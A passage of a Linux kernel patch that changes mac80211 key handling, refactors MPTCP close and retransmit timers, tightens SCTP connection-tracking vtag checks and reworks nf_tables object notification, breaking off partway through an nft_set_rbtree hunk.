+index cf3453b532d67..0167413d56972 100644
+--- a/net/mac80211/cfg.c
++++ b/net/mac80211/cfg.c
+@@ -566,6 +566,9 @@ static int ieee80211_add_key(struct wiphy *wiphy, struct net_device *dev,
+ 	}
+ 
+ 	err = ieee80211_key_link(key, link, sta);
++	/* KRACK protection, shouldn't happen but just silently accept key */
++	if (err == -EALREADY)
++		err = 0;
+ 
+  out_unlock:
+ 	mutex_unlock(&local->sta_mtx);
+diff --git a/net/mac80211/key.c b/net/mac80211/key.c
+index e8f6c1e5eabfc..23bb24243c6e9 100644
+--- a/net/mac80211/key.c
++++ b/net/mac80211/key.c
+@@ -901,7 +901,7 @@ int ieee80211_key_link(struct ieee80211_key *key,
+ 	 */
+ 	if (ieee80211_key_identical(sdata, old_key, key)) {
+ 		ieee80211_key_free_unused(key);
+-		ret = 0;
++		ret = -EALREADY;
+ 		goto out;
+ 	}
+ 
+diff --git a/net/mptcp/pm_netlink.c b/net/mptcp/pm_netlink.c
+index 9127a7fd5269c..5d845fcf3d09e 100644
+--- a/net/mptcp/pm_netlink.c
++++ b/net/mptcp/pm_netlink.c
+@@ -2047,7 +2047,7 @@ static int mptcp_event_put_token_and_ssk(struct sk_buff *skb,
+ 	    nla_put_s32(skb, MPTCP_ATTR_IF_IDX, ssk->sk_bound_dev_if))
+ 		return -EMSGSIZE;
+ 
+-	sk_err = ssk->sk_err;
++	sk_err = READ_ONCE(ssk->sk_err);
+ 	if (sk_err && sk->sk_state == TCP_ESTABLISHED &&
+ 	    nla_put_u8(skb, MPTCP_ATTR_ERROR, sk_err))
+ 		return -EMSGSIZE;
+diff --git a/net/mptcp/pm_userspace.c b/net/mptcp/pm_userspace.c
+index 8a2aa63caa51f..38cbdc66d8bff 100644
+--- a/net/mptcp/pm_userspace.c
++++ b/net/mptcp/pm_userspace.c
+@@ -309,12 +309,6 @@ int mptcp_nl_cmd_sf_create(struct sk_buff *skb, struct genl_info *info)
+ 		goto create_err;
+ 	}
+ 
+-	if (addr_l.id == 0) {
+-		NL_SET_ERR_MSG_ATTR(info->extack, laddr, "missing local addr id");
+-		err = -EINVAL;
+-		goto create_err;
+-	}
+-
+ 	err = mptcp_pm_parse_addr(raddr, info, &addr_r);
+ 	if (err < 0) {
+ 		NL_SET_ERR_MSG_ATTR(info->extack, raddr, "error parsing remote addr");
+diff --git a/net/mptcp/protocol.c b/net/mptcp/protocol.c
+index 6dd880d6b0518..b6e0579e72644 100644
+--- a/net/mptcp/protocol.c
++++ b/net/mptcp/protocol.c
+@@ -401,7 +401,7 @@ drop:
+ 	return false;
+ }
+ 
+-static void mptcp_stop_timer(struct sock *sk)
++static void mptcp_stop_rtx_timer(struct sock *sk)
+ {
+ 	struct inet_connection_sock *icsk = inet_csk(sk);
+ 
+@@ -765,6 +765,46 @@ static bool __mptcp_ofo_queue(struct mptcp_sock *msk)
+ 	return moved;
+ }
+ 
++static bool __mptcp_subflow_error_report(struct sock *sk, struct sock *ssk)
++{
++	int err = sock_error(ssk);
++	int ssk_state;
++
++	if (!err)
++		return false;
++
++	/* only propagate errors on fallen-back sockets or
++	 * on MPC connect
++	 */
++	if (sk->sk_state != TCP_SYN_SENT && !__mptcp_check_fallback(mptcp_sk(sk)))
++		return false;
++
++	/* We need to propagate only transition to CLOSE state.
++	 * Orphaned socket will see such state change via
++	 * subflow_sched_work_if_closed() and that path will properly
++	 * destroy the msk as needed.
++	 */
++	ssk_state = inet_sk_state_load(ssk);
++	if (ssk_state == TCP_CLOSE && !sock_flag(sk, SOCK_DEAD))
++		inet_sk_state_store(sk, ssk_state);
++	WRITE_ONCE(sk->sk_err, -err);
++
++	/* This barrier is coupled with smp_rmb() in mptcp_poll() */
++	smp_wmb();
++	sk_error_report(sk);
++	return true;
++}
++
++void __mptcp_error_report(struct sock *sk)
++{
++	struct mptcp_subflow_context *subflow;
++	struct mptcp_sock *msk = mptcp_sk(sk);
++
++	mptcp_for_each_subflow(msk, subflow)
++		if (__mptcp_subflow_error_report(sk, mptcp_subflow_tcp_sock(subflow)))
++			break;
++}
++
+ /* In most cases we will be able to lock the mptcp socket.  If its already
+  * owned, we need to defer to the work queue to avoid ABBA deadlock.
+  */
+@@ -846,6 +886,7 @@ static bool __mptcp_finish_join(struct mptcp_sock *msk, struct sock *ssk)
+ 
+ 	mptcp_sockopt_sync_locked(msk, ssk);
+ 	mptcp_subflow_joined(msk, ssk);
++	mptcp_stop_tout_timer(sk);
+ 	return true;
+ }
+ 
+@@ -865,12 +906,12 @@ static void __mptcp_flush_join_list(struct sock *sk, struct list_head *join_list
+ 	}
+ }
+ 
+-static bool mptcp_timer_pending(struct sock *sk)
++static bool mptcp_rtx_timer_pending(struct sock *sk)
+ {
+ 	return timer_pending(&inet_csk(sk)->icsk_retransmit_timer);
+ }
+ 
+-static void mptcp_reset_timer(struct sock *sk)
++static void mptcp_reset_rtx_timer(struct sock *sk)
+ {
+ 	struct inet_connection_sock *icsk = inet_csk(sk);
+ 	unsigned long tout;
+@@ -1054,10 +1095,10 @@ static void __mptcp_clean_una(struct sock *sk)
+ out:
+ 	if (snd_una == READ_ONCE(msk->snd_nxt) &&
+ 	    snd_una == READ_ONCE(msk->write_seq)) {
+-		if (mptcp_timer_pending(sk) && !mptcp_data_fin_enabled(msk))
+-			mptcp_stop_timer(sk);
++		if (mptcp_rtx_timer_pending(sk) && !mptcp_data_fin_enabled(msk))
++			mptcp_stop_rtx_timer(sk);
+ 	} else {
+-		mptcp_reset_timer(sk);
++		mptcp_reset_rtx_timer(sk);
+ 	}
+ }
+ 
+@@ -1606,8 +1647,8 @@ void __mptcp_push_pending(struct sock *sk, unsigned int flags)
+ 
+ out:
+ 	/* ensure the rtx timer is running */
+-	if (!mptcp_timer_pending(sk))
+-		mptcp_reset_timer(sk);
++	if (!mptcp_rtx_timer_pending(sk))
++		mptcp_reset_rtx_timer(sk);
+ 	if (do_check_data_fin)
+ 		mptcp_check_send_data_fin(sk);
+ }
+@@ -1665,8 +1706,8 @@ out:
+ 	if (copied) {
+ 		tcp_push(ssk, 0, info.mss_now, tcp_sk(ssk)->nonagle,
+ 			 info.size_goal);
+-		if (!mptcp_timer_pending(sk))
+-			mptcp_reset_timer(sk);
++		if (!mptcp_rtx_timer_pending(sk))
++			mptcp_reset_rtx_timer(sk);
+ 
+ 		if (msk->snd_data_fin_enable &&
+ 		    msk->snd_nxt + 1 == msk->write_seq)
+@@ -2227,7 +2268,7 @@ static void mptcp_retransmit_timer(struct timer_list *t)
+ 	sock_put(sk);
+ }
+ 
+-static void mptcp_timeout_timer(struct timer_list *t)
++static void mptcp_tout_timer(struct timer_list *t)
+ {
+ 	struct sock *sk = from_timer(sk, t, sk_timer);
+ 
+@@ -2349,18 +2390,14 @@ static void __mptcp_close_ssk(struct sock *sk, struct sock *ssk,
+ 	bool dispose_it, need_push = false;
+ 
+ 	/* If the first subflow moved to a close state before accept, e.g. due
+-	 * to an incoming reset, mptcp either:
+-	 * - if either the subflow or the msk are dead, destroy the context
+-	 *   (the subflow socket is deleted by inet_child_forget) and the msk
+-	 * - otherwise do nothing at the moment and take action at accept and/or
+-	 *   listener shutdown - user-space must be able to accept() the closed
+-	 *   socket.
++	 * to an incoming reset or listener shutdown, the subflow socket is
++	 * already deleted by inet_child_forget() and the mptcp socket can't
++	 * survive too.
+ 	 */
+-	if (msk->in_accept_queue && msk->first == ssk) {
+-		if (!sock_flag(sk, SOCK_DEAD) && !sock_flag(ssk, SOCK_DEAD))
+-			return;
+-
++	if (msk->in_accept_queue && msk->first == ssk &&
++	    (sock_flag(sk, SOCK_DEAD) || sock_flag(ssk, SOCK_DEAD))) {
+ 		/* ensure later check in mptcp_worker() will dispose the msk */
++		mptcp_set_close_tout(sk, tcp_jiffies32 - (TCP_TIMEWAIT_LEN + 1));
+ 		sock_set_flag(sk, SOCK_DEAD);
+ 		lock_sock_nested(ssk, SINGLE_DEPTH_NESTING);
+ 		mptcp_subflow_drop_ctx(ssk);
+@@ -2413,6 +2450,7 @@ static void __mptcp_close_ssk(struct sock *sk, struct sock *ssk,
+ 	}
+ 
+ out_release:
++	__mptcp_subflow_error_report(sk, ssk);
+ 	release_sock(ssk);
+ 
+ 	sock_put(ssk);
+@@ -2426,6 +2464,22 @@ out:
+ 
+ 	if (need_push)
+ 		__mptcp_push_pending(sk, 0);
++
++	/* Catch every 'all subflows closed' scenario, including peers silently
++	 * closing them, e.g. due to timeout.
++	 * For established sockets, allow an additional timeout before closing,
++	 * as the protocol can still create more subflows.
++	 */
++	if (list_is_singular(&msk->conn_list) && msk->first &&
++	    inet_sk_state_load(msk->first) == TCP_CLOSE) {
++		if (sk->sk_state != TCP_ESTABLISHED ||
++		    msk->in_accept_queue || sock_flag(sk, SOCK_DEAD)) {
++			inet_sk_state_store(sk, TCP_CLOSE);
++			mptcp_close_wake_up(sk);
++		} else {
++			mptcp_start_tout_timer(sk);
++		}
++	}
+ }
+ 
+ void mptcp_close_ssk(struct sock *sk, struct sock *ssk,
+@@ -2469,23 +2523,14 @@ static void __mptcp_close_subflow(struct sock *sk)
+ 
+ }
+ 
+-static bool mptcp_should_close(const struct sock *sk)
++static bool mptcp_close_tout_expired(const struct sock *sk)
+ {
+-	s32 delta = tcp_jiffies32 - inet_csk(sk)->icsk_mtup.probe_timestamp;
+-	struct mptcp_subflow_context *subflow;
+-
+-	if (delta >= TCP_TIMEWAIT_LEN || mptcp_sk(sk)->in_accept_queue)
+-		return true;
++	if (!inet_csk(sk)->icsk_mtup.probe_timestamp ||
++	    sk->sk_state == TCP_CLOSE)
++		return false;
+ 
+-	/* if all subflows are in closed status don't bother with additional
+-	 * timeout
+-	 */
+-	mptcp_for_each_subflow(mptcp_sk(sk), subflow) {
+-		if (inet_sk_state_load(mptcp_subflow_tcp_sock(subflow)) !=
+-		    TCP_CLOSE)
+-			return false;
+-	}
+-	return true;
++	return time_after32(tcp_jiffies32,
++		  inet_csk(sk)->icsk_mtup.probe_timestamp + TCP_TIMEWAIT_LEN);
+ }
+ 
+ static void mptcp_check_fastclose(struct mptcp_sock *msk)
+@@ -2513,15 +2558,15 @@ static void mptcp_check_fastclose(struct mptcp_sock *msk)
+ 	/* Mirror the tcp_reset() error propagation */
+ 	switch (sk->sk_state) {
+ 	case TCP_SYN_SENT:
+-		sk->sk_err = ECONNREFUSED;
++		WRITE_ONCE(sk->sk_err, ECONNREFUSED);
+ 		break;
+ 	case TCP_CLOSE_WAIT:
+-		sk->sk_err = EPIPE;
++		WRITE_ONCE(sk->sk_err, EPIPE);
+ 		break;
+ 	case TCP_CLOSE:
+ 		return;
+ 	default:
+-		sk->sk_err = ECONNRESET;
++		WRITE_ONCE(sk->sk_err, ECONNRESET);
+ 	}
+ 
+ 	inet_sk_state_store(sk, TCP_CLOSE);
+@@ -2597,27 +2642,28 @@ static void __mptcp_retrans(struct sock *sk)
+ reset_timer:
+ 	mptcp_check_and_set_pending(sk);
+ 
+-	if (!mptcp_timer_pending(sk))
+-		mptcp_reset_timer(sk);
++	if (!mptcp_rtx_timer_pending(sk))
++		mptcp_reset_rtx_timer(sk);
+ }
+ 
+ /* schedule the timeout timer for the relevant event: either close timeout
+  * or mp_fail timeout. The close timeout takes precedence on the mp_fail one
+  */
+-void mptcp_reset_timeout(struct mptcp_sock *msk, unsigned long fail_tout)
++void mptcp_reset_tout_timer(struct mptcp_sock *msk, unsigned long fail_tout)
+ {
+ 	struct sock *sk = (struct sock *)msk;
+ 	unsigned long timeout, close_timeout;
+ 
+-	if (!fail_tout && !sock_flag(sk, SOCK_DEAD))
++	if (!fail_tout && !inet_csk(sk)->icsk_mtup.probe_timestamp)
+ 		return;
+ 
+-	close_timeout = inet_csk(sk)->icsk_mtup.probe_timestamp - tcp_jiffies32 + jiffies + TCP_TIMEWAIT_LEN;
++	close_timeout = inet_csk(sk)->icsk_mtup.probe_timestamp - tcp_jiffies32 + jiffies +
++			TCP_TIMEWAIT_LEN;
+ 
+ 	/* the close timeout takes precedence on the fail one, and here at least one of
+ 	 * them is active
+ 	 */
+-	timeout = sock_flag(sk, SOCK_DEAD) ? close_timeout : fail_tout;
++	timeout = inet_csk(sk)->icsk_mtup.probe_timestamp ? close_timeout : fail_tout;
+ 
+ 	sk_reset_timer(sk, &sk->sk_timer, timeout);
+ }
+@@ -2636,8 +2682,6 @@ static void mptcp_mp_fail_no_response(struct mptcp_sock *msk)
+ 	mptcp_subflow_reset(ssk);
+ 	WRITE_ONCE(mptcp_subflow_ctx(ssk)->fail_tout, 0);
+ 	unlock_sock_fast(ssk, slow);
+-
+-	mptcp_reset_timeout(msk, 0);
+ }
+ 
+ static void mptcp_do_fastclose(struct sock *sk)
+@@ -2676,19 +2720,15 @@ static void mptcp_worker(struct work_struct *work)
+ 	if (test_and_clear_bit(MPTCP_WORK_CLOSE_SUBFLOW, &msk->flags))
+ 		__mptcp_close_subflow(sk);
+ 
+-	/* There is no point in keeping around an orphaned sk timedout or
+-	 * closed, but we need the msk around to reply to incoming DATA_FIN,
+-	 * even if it is orphaned and in FIN_WAIT2 state
+-	 */
+-	if (sock_flag(sk, SOCK_DEAD)) {
+-		if (mptcp_should_close(sk)) {
+-			inet_sk_state_store(sk, TCP_CLOSE);
+-			mptcp_do_fastclose(sk);
+-		}
+-		if (sk->sk_state == TCP_CLOSE) {
+-			__mptcp_destroy_sock(sk);
+-			goto unlock;
+-		}
++	if (mptcp_close_tout_expired(sk)) {
++		inet_sk_state_store(sk, TCP_CLOSE);
++		mptcp_do_fastclose(sk);
++		mptcp_close_wake_up(sk);
++	}
++
++	if (sock_flag(sk, SOCK_DEAD) && sk->sk_state == TCP_CLOSE) {
++		__mptcp_destroy_sock(sk);
++		goto unlock;
+ 	}
+ 
+ 	if (test_and_clear_bit(MPTCP_WORK_RTX, &msk->flags))
+@@ -2728,7 +2768,7 @@ static int __mptcp_init_sock(struct sock *sk)
+ 
+ 	/* re-use the csk retrans timer for MPTCP-level retrans */
+ 	timer_setup(&msk->sk.icsk_retransmit_timer, mptcp_retransmit_timer, 0);
+-	timer_setup(&sk->sk_timer, mptcp_timeout_timer, 0);
++	timer_setup(&sk->sk_timer, mptcp_tout_timer, 0);
+ 
+ 	return 0;
+ }
+@@ -2820,8 +2860,8 @@ void mptcp_subflow_shutdown(struct sock *sk, struct sock *ssk, int how)
+ 		} else {
+ 			pr_debug("Sending DATA_FIN on subflow %p", ssk);
+ 			tcp_send_ack(ssk);
+-			if (!mptcp_timer_pending(sk))
+-				mptcp_reset_timer(sk);
++			if (!mptcp_rtx_timer_pending(sk))
++				mptcp_reset_rtx_timer(sk);
+ 		}
+ 		break;
+ 	}
+@@ -2904,7 +2944,7 @@ static void __mptcp_destroy_sock(struct sock *sk)
+ 
+ 	might_sleep();
+ 
+-	mptcp_stop_timer(sk);
++	mptcp_stop_rtx_timer(sk);
+ 	sk_stop_timer(sk, &sk->sk_timer);
+ 	msk->pm.status = 0;
+ 
+@@ -2984,7 +3024,6 @@ bool __mptcp_close(struct sock *sk, long timeout)
+ 
+ cleanup:
+ 	/* orphan all the subflows */
+-	inet_csk(sk)->icsk_mtup.probe_timestamp = tcp_jiffies32;
+ 	mptcp_for_each_subflow(msk, subflow) {
+ 		struct sock *ssk = mptcp_subflow_tcp_sock(subflow);
+ 		bool slow = lock_sock_fast_nested(ssk);
+@@ -3021,7 +3060,7 @@ cleanup:
+ 		__mptcp_destroy_sock(sk);
+ 		do_cancel_work = true;
+ 	} else {
+-		mptcp_reset_timeout(msk, 0);
++		mptcp_start_tout_timer(sk);
+ 	}
+ 
+ 	return do_cancel_work;
+@@ -3084,8 +3123,8 @@ static int mptcp_disconnect(struct sock *sk, int flags)
+ 	mptcp_check_listen_stop(sk);
+ 	inet_sk_state_store(sk, TCP_CLOSE);
+ 
+-	mptcp_stop_timer(sk);
+-	sk_stop_timer(sk, &sk->sk_timer);
++	mptcp_stop_rtx_timer(sk);
++	mptcp_stop_tout_timer(sk);
+ 
+ 	if (mptcp_sk(sk)->token)
+ 		mptcp_event(MPTCP_EVENT_CLOSED, mptcp_sk(sk), NULL, GFP_KERNEL);
+@@ -3895,7 +3934,7 @@ static __poll_t mptcp_poll(struct file *file, struct socket *sock,
+ 
+ 	/* This barrier is coupled with smp_wmb() in __mptcp_error_report() */
+ 	smp_rmb();
+-	if (sk->sk_err)
++	if (READ_ONCE(sk->sk_err))
+ 		mask |= EPOLLERR;
+ 
+ 	return mask;
+diff --git a/net/mptcp/protocol.h b/net/mptcp/protocol.h
+index d77b25636125b..91d89a0aeb586 100644
+--- a/net/mptcp/protocol.h
++++ b/net/mptcp/protocol.h
+@@ -681,7 +681,29 @@ void mptcp_get_options(const struct sk_buff *skb,
+ 
+ void mptcp_finish_connect(struct sock *sk);
+ void __mptcp_set_connected(struct sock *sk);
+-void mptcp_reset_timeout(struct mptcp_sock *msk, unsigned long fail_tout);
++void mptcp_reset_tout_timer(struct mptcp_sock *msk, unsigned long fail_tout);
++
++static inline void mptcp_stop_tout_timer(struct sock *sk)
++{
++	if (!inet_csk(sk)->icsk_mtup.probe_timestamp)
++		return;
++
++	sk_stop_timer(sk, &sk->sk_timer);
++	inet_csk(sk)->icsk_mtup.probe_timestamp = 0;
++}
++
++static inline void mptcp_set_close_tout(struct sock *sk, unsigned long tout)
++{
++	/* avoid 0 timestamp, as that means no close timeout */
++	inet_csk(sk)->icsk_mtup.probe_timestamp = tout ? : 1;
++}
++
++static inline void mptcp_start_tout_timer(struct sock *sk)
++{
++	mptcp_set_close_tout(sk, tcp_jiffies32);
++	mptcp_reset_tout_timer(mptcp_sk(sk), 0);
++}
++
+ static inline bool mptcp_is_fully_established(struct sock *sk)
+ {
+ 	return inet_sk_state_load(sk) == TCP_ESTABLISHED &&
+diff --git a/net/mptcp/subflow.c b/net/mptcp/subflow.c
+index 52a747a80e88e..b93b08a75017b 100644
+--- a/net/mptcp/subflow.c
++++ b/net/mptcp/subflow.c
+@@ -1161,7 +1161,7 @@ static void mptcp_subflow_fail(struct mptcp_sock *msk, struct sock *ssk)
+ 	WRITE_ONCE(subflow->fail_tout, fail_tout);
+ 	tcp_send_ack(ssk);
+ 
+-	mptcp_reset_timeout(msk, subflow->fail_tout);
++	mptcp_reset_tout_timer(msk, subflow->fail_tout);
+ }
+ 
+ static bool subflow_check_data_avail(struct sock *ssk)
+@@ -1248,7 +1248,7 @@ fallback:
+ 			subflow->reset_reason = MPTCP_RST_EMPTCP;
+ 
+ reset:
+-			ssk->sk_err = EBADMSG;
++			WRITE_ONCE(ssk->sk_err, EBADMSG);
+ 			tcp_set_state(ssk, TCP_CLOSE);
+ 			while ((skb = skb_peek(&ssk->sk_receive_queue)))
+ 				sk_eat_skb(ssk, skb);
+@@ -1305,42 +1305,6 @@ void mptcp_space(const struct sock *ssk, int *space, int *full_space)
+ 	*full_space = tcp_full_space(sk);
+ }
+ 
+-void __mptcp_error_report(struct sock *sk)
+-{
+-	struct mptcp_subflow_context *subflow;
+-	struct mptcp_sock *msk = mptcp_sk(sk);
+-
+-	mptcp_for_each_subflow(msk, subflow) {
+-		struct sock *ssk = mptcp_subflow_tcp_sock(subflow);
+-		int err = sock_error(ssk);
+-		int ssk_state;
+-
+-		if (!err)
+-			continue;
+-
+-		/* only propagate errors on fallen-back sockets or
+-		 * on MPC connect
+-		 */
+-		if (sk->sk_state != TCP_SYN_SENT && !__mptcp_check_fallback(msk))
+-			continue;
+-
+-		/* We need to propagate only transition to CLOSE state.
+-		 * Orphaned socket will see such state change via
+-		 * subflow_sched_work_if_closed() and that path will properly
+-		 * destroy the msk as needed.
+-		 */
+-		ssk_state = inet_sk_state_load(ssk);
+-		if (ssk_state == TCP_CLOSE && !sock_flag(sk, SOCK_DEAD))
+-			inet_sk_state_store(sk, ssk_state);
+-		sk->sk_err = -err;
+-
+-		/* This barrier is coupled with smp_rmb() in mptcp_poll() */
+-		smp_wmb();
+-		sk_error_report(sk);
+-		break;
+-	}
+-}
+-
+ static void subflow_error_report(struct sock *ssk)
+ {
+ 	struct sock *sk = mptcp_subflow_ctx(ssk)->conn;
+@@ -1527,6 +1491,7 @@ int __mptcp_subflow_connect(struct sock *sk, const struct mptcp_addr_info *loc,
+ 	mptcp_sock_graft(ssk, sk->sk_socket);
+ 	iput(SOCK_INODE(sf));
+ 	WRITE_ONCE(msk->allow_infinite_fallback, false);
++	mptcp_stop_tout_timer(sk);
+ 	return 0;
+ 
+ failed_unlink:
+diff --git a/net/netfilter/ipvs/ip_vs_sync.c b/net/netfilter/ipvs/ip_vs_sync.c
+index d4fe7bb4f853a..6574f4e651b1a 100644
+--- a/net/netfilter/ipvs/ip_vs_sync.c
++++ b/net/netfilter/ipvs/ip_vs_sync.c
+@@ -1507,8 +1507,8 @@ static int make_send_sock(struct netns_ipvs *ipvs, int id,
+ 	}
+ 
+ 	get_mcast_sockaddr(&mcast_addr, &salen, &ipvs->mcfg, id);
+-	result = sock->ops->connect(sock, (struct sockaddr *) &mcast_addr,
+-				    salen, 0);
++	result = kernel_connect(sock, (struct sockaddr *)&mcast_addr,
++				salen, 0);
+ 	if (result < 0) {
+ 		pr_err("Error connecting to the multicast addr\n");
+ 		goto error;
+diff --git a/net/netfilter/nf_conntrack_proto_sctp.c b/net/netfilter/nf_conntrack_proto_sctp.c
+index 7247af51bdfc4..c94a9971d790c 100644
+--- a/net/netfilter/nf_conntrack_proto_sctp.c
++++ b/net/netfilter/nf_conntrack_proto_sctp.c
+@@ -112,7 +112,7 @@ static const u8 sctp_conntracks[2][11][SCTP_CONNTRACK_MAX] = {
+ /* shutdown_ack */ {sSA, sCL, sCW, sCE, sES, sSA, sSA, sSA, sSA},
+ /* error        */ {sCL, sCL, sCW, sCE, sES, sSS, sSR, sSA, sCL},/* Can't have Stale cookie*/
+ /* cookie_echo  */ {sCL, sCL, sCE, sCE, sES, sSS, sSR, sSA, sCL},/* 5.2.4 - Big TODO */
+-/* cookie_ack   */ {sCL, sCL, sCW, sCE, sES, sSS, sSR, sSA, sCL},/* Can't come in orig dir */
++/* cookie_ack   */ {sCL, sCL, sCW, sES, sES, sSS, sSR, sSA, sCL},/* Can't come in orig dir */
+ /* shutdown_comp*/ {sCL, sCL, sCW, sCE, sES, sSS, sSR, sCL, sCL},
+ /* heartbeat    */ {sHS, sCL, sCW, sCE, sES, sSS, sSR, sSA, sHS},
+ /* heartbeat_ack*/ {sCL, sCL, sCW, sCE, sES, sSS, sSR, sSA, sHS},
+@@ -126,7 +126,7 @@ static const u8 sctp_conntracks[2][11][SCTP_CONNTRACK_MAX] = {
+ /* shutdown     */ {sIV, sCL, sCW, sCE, sSR, sSS, sSR, sSA, sIV},
+ /* shutdown_ack */ {sIV, sCL, sCW, sCE, sES, sSA, sSA, sSA, sIV},
+ /* error        */ {sIV, sCL, sCW, sCL, sES, sSS, sSR, sSA, sIV},
+-/* cookie_echo  */ {sIV, sCL, sCW, sCE, sES, sSS, sSR, sSA, sIV},/* Can't come in reply dir */
++/* cookie_echo  */ {sIV, sCL, sCE, sCE, sES, sSS, sSR, sSA, sIV},/* Can't come in reply dir */
+ /* cookie_ack   */ {sIV, sCL, sCW, sES, sES, sSS, sSR, sSA, sIV},
+ /* shutdown_comp*/ {sIV, sCL, sCW, sCE, sES, sSS, sSR, sCL, sIV},
+ /* heartbeat    */ {sIV, sCL, sCW, sCE, sES, sSS, sSR, sSA, sHS},
+@@ -426,6 +426,9 @@ int nf_conntrack_sctp_packet(struct nf_conn *ct,
+ 			/* (D) vtag must be same as init_vtag as found in INIT_ACK */
+ 			if (sh->vtag != ct->proto.sctp.vtag[dir])
+ 				goto out_unlock;
++		} else if (sch->type == SCTP_CID_COOKIE_ACK) {
++			ct->proto.sctp.init[dir] = 0;
++			ct->proto.sctp.init[!dir] = 0;
+ 		} else if (sch->type == SCTP_CID_HEARTBEAT) {
+ 			if (ct->proto.sctp.vtag[dir] == 0) {
+ 				pr_debug("Setting %d vtag %x for dir %d\n", sch->type, sh->vtag, dir);
+@@ -474,16 +477,18 @@ int nf_conntrack_sctp_packet(struct nf_conn *ct,
+ 		}
+ 
+ 		/* If it is an INIT or an INIT ACK note down the vtag */
+-		if (sch->type == SCTP_CID_INIT ||
+-		    sch->type == SCTP_CID_INIT_ACK) {
+-			struct sctp_inithdr _inithdr, *ih;
++		if (sch->type == SCTP_CID_INIT) {
++			struct sctp_inithdr _ih, *ih;
+ 
+-			ih = skb_header_pointer(skb, offset + sizeof(_sch),
+-						sizeof(_inithdr), &_inithdr);
+-			if (ih == NULL)
++			ih = skb_header_pointer(skb, offset + sizeof(_sch), sizeof(*ih), &_ih);
++			if (!ih)
+ 				goto out_unlock;
+-			pr_debug("Setting vtag %x for dir %d\n",
+-				 ih->init_tag, !dir);
++
++			if (ct->proto.sctp.init[dir] && ct->proto.sctp.init[!dir])
++				ct->proto.sctp.init[!dir] = 0;
++			ct->proto.sctp.init[dir] = 1;
++
++			pr_debug("Setting vtag %x for dir %d\n", ih->init_tag, !dir);
+ 			ct->proto.sctp.vtag[!dir] = ih->init_tag;
+ 
+ 			/* don't renew timeout on init retransmit so
+@@ -494,6 +499,24 @@ int nf_conntrack_sctp_packet(struct nf_conn *ct,
+ 			    old_state == SCTP_CONNTRACK_CLOSED &&
+ 			    nf_ct_is_confirmed(ct))
+ 				ignore = true;
++		} else if (sch->type == SCTP_CID_INIT_ACK) {
++			struct sctp_inithdr _ih, *ih;
++			__be32 vtag;
++
++			ih = skb_header_pointer(skb, offset + sizeof(_sch), sizeof(*ih), &_ih);
++			if (!ih)
++				goto out_unlock;
++
++			vtag = ct->proto.sctp.vtag[!dir];
++			if (!ct->proto.sctp.init[!dir] && vtag && vtag != ih->init_tag)
++				goto out_unlock;
++			/* collision */
++			if (ct->proto.sctp.init[dir] && ct->proto.sctp.init[!dir] &&
++			    vtag != ih->init_tag)
++				goto out_unlock;
++
++			pr_debug("Setting vtag %x for dir %d\n", ih->init_tag, !dir);
++			ct->proto.sctp.vtag[!dir] = ih->init_tag;
+ 		}
+ 
+ 		ct->proto.sctp.state = new_state;
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 52b81dc1fcf5b..5e3dbe2652dbd 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -7576,24 +7576,14 @@ static int nf_tables_delobj(struct sk_buff *skb, const struct nfnl_info *info,
+ 	return nft_delobj(&ctx, obj);
+ }
+ 
+-void nft_obj_notify(struct net *net, const struct nft_table *table,
+-		    struct nft_object *obj, u32 portid, u32 seq, int event,
+-		    u16 flags, int family, int report, gfp_t gfp)
++static void
++__nft_obj_notify(struct net *net, const struct nft_table *table,
++		 struct nft_object *obj, u32 portid, u32 seq, int event,
++		 u16 flags, int family, int report, gfp_t gfp)
+ {
+ 	struct nftables_pernet *nft_net = nft_pernet(net);
+ 	struct sk_buff *skb;
+ 	int err;
+-	char *buf = kasprintf(gfp, "%s:%u",
+-			      table->name, nft_net->base_seq);
+-
+-	audit_log_nfcfg(buf,
+-			family,
+-			obj->handle,
+-			event == NFT_MSG_NEWOBJ ?
+-				 AUDIT_NFT_OP_OBJ_REGISTER :
+-				 AUDIT_NFT_OP_OBJ_UNREGISTER,
+-			gfp);
+-	kfree(buf);
+ 
+ 	if (!report &&
+ 	    !nfnetlink_has_listeners(net, NFNLGRP_NFTABLES))
+@@ -7616,13 +7606,35 @@ void nft_obj_notify(struct net *net, const struct nft_table *table,
+ err:
+ 	nfnetlink_set_err(net, portid, NFNLGRP_NFTABLES, -ENOBUFS);
+ }
++
++void nft_obj_notify(struct net *net, const struct nft_table *table,
++		    struct nft_object *obj, u32 portid, u32 seq, int event,
++		    u16 flags, int family, int report, gfp_t gfp)
++{
++	struct nftables_pernet *nft_net = nft_pernet(net);
++	char *buf = kasprintf(gfp, "%s:%u",
++			      table->name, nft_net->base_seq);
++
++	audit_log_nfcfg(buf,
++			family,
++			obj->handle,
++			event == NFT_MSG_NEWOBJ ?
++				 AUDIT_NFT_OP_OBJ_REGISTER :
++				 AUDIT_NFT_OP_OBJ_UNREGISTER,
++			gfp);
++	kfree(buf);
++
++	__nft_obj_notify(net, table, obj, portid, seq, event,
++			 flags, family, report, gfp);
++}
+ EXPORT_SYMBOL_GPL(nft_obj_notify);
+ 
+ static void nf_tables_obj_notify(const struct nft_ctx *ctx,
+ 				 struct nft_object *obj, int event)
+ {
+-	nft_obj_notify(ctx->net, ctx->table, obj, ctx->portid, ctx->seq, event,
+-		       ctx->flags, ctx->family, ctx->report, GFP_KERNEL);
++	__nft_obj_notify(ctx->net, ctx->table, obj, ctx->portid,
++			 ctx->seq, event, ctx->flags, ctx->family,
++			 ctx->report, GFP_KERNEL);
+ }
+ 
+ /*
+diff --git a/net/netfilter/nft_set_rbtree.c b/net/netfilter/nft_set_rbtree.c
+index 487572dcd6144..2660ceab3759d 100644
+--- a/net/netfilter/nft_set_rbtree.c
++++ b/net/netfilter/nft_set_rbtree.c
+@@ -233,10 +233,9 @@ static void nft_rbtree_gc_remove(struct net *net, struct nft_set *set,
+ 	rb_erase(&rbe->node, &priv->root);
+ }
+ 
+-static int nft_rbtree_gc_elem(const struct nft_set *__set,
+-			      struct nft_rbtree *priv,
+-			      struct nft_rbtree_elem *rbe,
+-			      u8 genmask)
++static const struct nft_rbtree_elem *
++nft_rbtree_gc_elem(const struct nft_set *__set, struct nft_rbtree *priv,
++		   struct nft_rbtree_elem *rbe, u8 genmask)
+ {
+ 	struct nft_set *set = (struct nft_set *)__set;
+ 	struct rb_node *prev = rb_prev(&rbe->node);
+@@ -246,7 +245,7 @@ static int nft_rbtree_gc_elem(const struct nft_set *__set,
+ 
